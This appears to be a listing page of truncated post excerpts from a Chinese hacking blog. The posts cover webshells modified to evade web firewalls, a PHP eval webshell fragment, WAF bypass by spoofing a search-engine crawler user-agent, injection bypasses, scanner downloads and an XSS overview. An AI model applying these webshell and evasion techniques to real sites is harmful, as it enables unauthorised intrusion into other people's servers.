起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit(20);error_reporting(0)...
Jonty
6
0
4
几个变性的asp–过防火墙 过狗效果都不错 ```basic ``` ```basic ``` 这个是90sec发的 ```basic ``` 密码-7 几个变性的php–过防火墙 过狗效果都不错: ```basic ``` ```basi...
Jonty
4
0
0
一、马儿篇,都是以前可以过护卫神的马二、注入篇,可以绕过注入的方法三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿 一、马儿篇 1号 <!--?php <br ?--> @eval ($_POST['1...
Jonty
5
0
1
作为玩黑的,一定要有被“黑”的心理准备和被黑后的“报复”手段。为此,量身打造的“木马后门检测工具”将是你的利器,后续会针对破解及原理陆续放出文章。 {anote icon="fa-download" href="http://pan.bai...
Jonty
1
0
0
支持功能: 1.目录扫描 2.旁注扫描(扫描同服和整个C段所有站点漏洞) 3.二级域名扫描 4.端口扫描 5.开源CMS识别 6.漏洞扫描 {anote icon="fa-download" href="http://pan.baidu.c...
Jonty
5
0
0
如图 {anote icon="fa-download" href="http://pan.baidu.com/share/link?shareid=430898&uk=1547026424" type="success" cont...
Jonty
7
0
0
网站狗升级到了3.0版,这个exp已经失效了,只对2.4版本有效。 作者:Seay 搜索引擎爬虫是在安全狗的白名单,我们只需要伪装成爬虫就OK了。 那安全狗是怎么判断爬虫的呢??我测试了一下,发现他用的很普通的方法,就是user-agent...
Jonty
8
0
0
XSS跨站脚本攻击一直都被认为是客户端Web安全中最主流的攻击方式。因为Web环境的复杂性以及XSS跨站脚本攻击的多变性,使得该类型攻击很难彻底解决。那么,XSS跨站脚本攻击具体攻击行为是什么,又该如何进行有效的防范呢?本文对此进行了有针对...
Jonty
6
0
0